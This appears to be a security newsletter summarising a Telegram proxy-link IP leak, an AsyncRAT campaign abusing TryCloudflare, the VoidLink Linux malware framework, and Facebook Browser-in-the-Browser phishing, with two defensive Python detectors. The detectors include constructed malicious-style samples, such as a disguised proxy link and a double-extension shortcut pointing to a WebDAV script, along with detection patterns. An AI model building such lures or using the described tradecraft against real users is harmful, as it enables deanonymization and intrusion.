TRENDING TOPICS JAN 13, 2026

Researchers have disclosed a Telegram client behavior that allows attackers to expose a user’s real IP address with a single click by abusing how MTProto proxy links are handled on mobile platforms. Specially crafted t[.]me/proxy links can be visually disguised as benign Telegram usernames or ordinary links, yet when tapped on Android or iOS clients, Telegram automatically attempts a test connection to the specified proxy server. This connection occurs before any user confirmation and bypasses existing proxy configurations, causing the device to initiate a direct outbound request to attacker-controlled infrastructure. As a result, the proxy operator can immediately log the user’s true IP address, enabling deanonymization, rough geolocation, and follow-on targeting with minimal user interaction. The technique has been compared to legacy auto-authentication leaks, such as NTLM hash disclosures, where background network requests are triggered without explicit user awareness. While Telegram has stated that IP visibility is inherent to internet communications and not unique to its platform, it acknowledged the potential for abuse and confirmed plans to introduce user warnings when proxy links are clicked. Until mitigations are broadly deployed, this behavior presents a low-effort, high-confidence targeting vector against journalists, activists, and users relying on Telegram proxies for anonymity. Users are advised to treat disguised Telegram links with caution and avoid interacting with proxy links from untrusted sources, particularly in high-risk or adversarial environments.
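As an added example (not from the original report or from Telegram), the following Python checks the links in a message before anyone taps them: it recognises the t.me/proxy, t.me/socks and tg://proxy forms that trigger the automatic test connection and flags those whose visible text hides that fact. The sample links, hosts and addresses are constructed placeholders.

```python
from urllib.parse import urlparse, parse_qs

TELEGRAM_HOSTS = {"t.me", "telegram.me", "telegram.dog"}
PROXY_PATHS = {"proxy", "socks"}          # t.me/proxy (MTProto) and t.me/socks


def classify_telegram_link(href: str) -> dict:
    """Classify one href: "proxy" for t.me/proxy, t.me/socks and tg://proxy links
    (the ones that trigger the automatic test connection), "telegram" for any
    other t.me link, "non-telegram" otherwise. Defanged "[.]" is undone first."""
    href = href.strip().replace("[.]", ".")
    u = urlparse(href)
    scheme = u.scheme.lower()
    if scheme == "tg":                       # tg://proxy?server=..&port=..&secret=..
        first = u.netloc.lower()
    elif scheme in ("http", "https") and (u.hostname or "").lower() in TELEGRAM_HOSTS:
        first = u.path.strip("/").split("/")[0].lower()
    else:
        return {"kind": "non-telegram", "server": None, "port": None}
    if first in PROXY_PATHS:
        q = parse_qs(u.query)
        return {"kind": "proxy", "server": q.get("server", [None])[0],
                "port": q.get("port", [None])[0]}
    return {"kind": "telegram", "server": None, "port": None}


def find_disguised_proxy_links(links):
    """links: iterable of (visible_text, href) pairs as rendered in a message.
    Returns one finding per proxy href; 'disguised' is True when the visible
    text does not itself reveal that the target is a proxy link."""
    findings = []
    for text, href in links:
        info = classify_telegram_link(href)
        if info["kind"] != "proxy":
            continue
        disguised = classify_telegram_link(text)["kind"] != "proxy"
        findings.append({"text": text, "server": info["server"],
                         "port": info["port"], "disguised": disguised})
    return findings


# Constructed sample message links; hosts and addresses are placeholders.
OVERT = "https://t.me/proxy?server=proxy.example.net&port=443&secret=ee00"
SAMPLE_LINKS = [
    ("@support_team", OVERT),                                  # looks like a username
    ("https://t.me/alice", "tg://proxy?server=198.51.100.7&port=8443&secret=dd"),
    ("https://t.me/alice", "https://t.me/alice"),              # ordinary link
    (OVERT, OVERT),                                            # proxy link shown as such
]

if __name__ == "__main__":
    for finding in find_disguised_proxy_links(SAMPLE_LINKS):
        print(finding)
```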

Update: AsyncRAT Campaign Abuses Cloudflare Tunnels and Legitimate Python Environments for Stealthy Deployment

Trend Micro researchers analyzing a recent AsyncRAT campaign observed threat actors abusing Cloudflare’s free-tier infrastructure and TryCloudflare tunneling domains to host malicious WebDAV servers, effectively concealing payload delivery behind widely trusted cloud services. The infection chain begins with phishing emails distributing Dropbox-hosted ZIP archives containing double-extension Internet Shortcut files ([.]pdf[.]url), which redirect victims to attacker-controlled TryCloudflare endpoints when opened. These shortcut files invoke Windows Script Host components that retrieve additional scripts from Cloudflare-backed infrastructure, enabling the attackers to stage payload delivery in a manner that blends into normal enterprise traffic. To further suppress user suspicion, the malware routinely opens legitimate PDF documents during execution, creating the illusion of benign activity while the malicious workflow continues in the background. The campaign’s technical sophistication is further demonstrated by its use of legitimate Python downloads from the official Python website to establish a complete execution environment on victim systems, enabling the malware to run trusted binaries rather than custom droppers. Once installed, Python-based loaders decrypt and inject AsyncRAT shellcode into explorer[.]exe using polymorphic APC injection, enabling stealthy remote access and process-level evasion. Persistence is achieved through multiple mechanisms, including startup folder batch scripts, WebDAV-mounted payload execution, and extensive abuse of living-off-the-land utilities such as PowerShell, rundll32[.]exe, and svchost[.]exe, significantly complicating detection and forensic response. 
Defenders should harden email filtering against double-extension attachments, restrict script execution from user-writable directories, monitor for anomalous Python installations and for code injection into explorer[.]exe, and block or closely inspect outbound traffic to cloud tunneling services such as TryCloudflare.
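To make the first two recommendations concrete, here is an added Python triage routine (not Trend Micro's tooling) that inspects a Windows Internet Shortcut for the traits described above: a document-style double extension, a file:// target that points at a remote WebDAV share, a TryCloudflare-hosted target, and a script-type payload. The sample shortcuts and the tunnel hostname are constructed placeholders, not indicators from the campaign.

```python
import configparser
import re
from urllib.parse import urlparse

# Extensions Windows hands to Script Host or the shell rather than to a viewer
SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".bat", ".cmd")
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.url$", re.IGNORECASE)


def triage_url_shortcut(filename: str, content: str) -> list:
    """Return the list of suspicious traits found (empty for a clean shortcut)."""
    reasons = []
    if DOUBLE_EXT.search(filename):
        reasons.append("double extension disguises .url as a document")
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(content.lstrip("\ufeff"))       # tolerate a UTF-8 BOM
    target = cp.get("InternetShortcut", "URL", fallback="")
    u = urlparse(target)
    if u.scheme.lower() == "file":
        # file://host@SSL/DavWWWRoot/... is the Windows WebDAV-over-HTTPS form,
        # so the host is everything before the first '@', not urlparse's hostname
        host = u.netloc.split("@")[0].lower()
        if host:
            reasons.append("file:// target resolves to a remote share (WebDAV/UNC)")
    else:
        host = (u.hostname or "").lower()
    if host.endswith(".trycloudflare.com"):
        reasons.append("target hosted behind a TryCloudflare tunnel")
    if u.path.lower().endswith(SCRIPT_EXT):
        reasons.append("target is a script type run by Windows Script Host/shell")
    return reasons


# Constructed samples; the tunnel hostname is a placeholder, not a real IoC.
MALICIOUS = ("Invoice_2026.pdf.url",
             "[InternetShortcut]\nURL=file://tunnel-name.trycloudflare.com@SSL/DavWWWRoot/Invoice.js\n")
BENIGN = ("Python Docs.url", "[InternetShortcut]\nURL=https://docs.python.org/3/\n")

if __name__ == "__main__":
    for name, body in (MALICIOUS, BENIGN):
        print(name, "->", triage_url_shortcut(name, body) or ["clean"])
```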

Check Point Research has disclosed a previously undocumented Linux malware framework dubbed VoidLink, designed for long-term, stealthy access to modern cloud and container environments. First identified in December 2025, VoidLink is assessed to be developed by Chinese-affiliated threat actors and represents a marked shift toward cloud-first post-exploitation tooling. Written primarily in Zig, the framework is highly modular and built around a custom plugin API inspired by Cobalt Strike’s Beacon Object Files, enabling operators to dynamically extend or modify capabilities during operations. VoidLink can identify major cloud providers, including AWS, Azure, GCP, Alibaba, and Tencent, detect Docker and Kubernetes environments, and harvest cloud, developer, and source-code credentials, suggesting potential use cases spanning espionage, long-term surveillance, and supply-chain intrusion scenarios targeting developers and cloud operators. Technically, VoidLink combines user-mode and kernel-level tradecraft to achieve adaptive stealth across monitored environments. Its capabilities include rootkit techniques using LD_PRELOAD, loadable kernel modules, and eBPF; in-memory plugin execution; and multi-protocol C2 over HTTP(S), WebSocket, DNS, ICMP, and emerging mesh-style P2P communications. The framework profiles host security controls and dynamically adjusts behavior to evade detection, including slowing activity in hardened environments, encrypting code at runtime, and self-deleting upon tampering. A full-featured Chinese-language web dashboard allows operators to build custom implants, deploy plugins, manage persistence, conduct lateral movement, and erase forensic artifacts. Although no confirmed widespread infections have been observed to date, VoidLink’s sophistication, rapid development cadence, and cloud-centric design underscore the growing strategic focus on Linux-based cloud infrastructure as a high-value target for advanced threat actors.

Update: Browser-in-the-Browser Facebook Phishing Campaigns Exploit Trusted Infrastructure and Visual Deception

Security researchers at Trellix have observed a surge in sophisticated Facebook phishing campaigns in the second half of 2025 that leverage the Browser-in-the-Browser (BitB) technique to harvest user credentials at scale. These attacks typically begin with spearphishing emails impersonating law firms, Meta security teams, or copyright enforcement notices, warning victims of account violations, unauthorized logins, or imminent suspension. Embedded links, often masked behind URL shorteners or fake CAPTCHA pages, redirect users to attacker-controlled sites that simulate legitimate Facebook authentication pop-ups within the browser window. By hardcoding real Facebook URLs and mimicking authentic login dialogs, BitB attacks exploit users’ familiarity with standard authentication flows, making the phishing interface nearly indistinguishable from a genuine login prompt. The campaigns further evade detection by abusing trusted cloud hosting platforms, including Netlify and Vercel, to host phishing infrastructure, lending legitimacy to malicious pages and bypassing traditional security filters. Victims are frequently guided through multi-step appeal forms that collect personal details before prompting for account passwords, enabling full account takeover once credentials are submitted. Trellix notes that this combination of trusted infrastructure abuse, URL redirection services, and advanced visual deception represents a significant escalation over traditional Facebook phishing activity. The technique underscores how attackers are shifting away from easily detectable malicious domains toward living-off-the-cloud tactics that undermine user trust and challenge conventional email and web defenses, reinforcing the need for layered protections and heightened scrutiny of in-browser login prompts.

Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.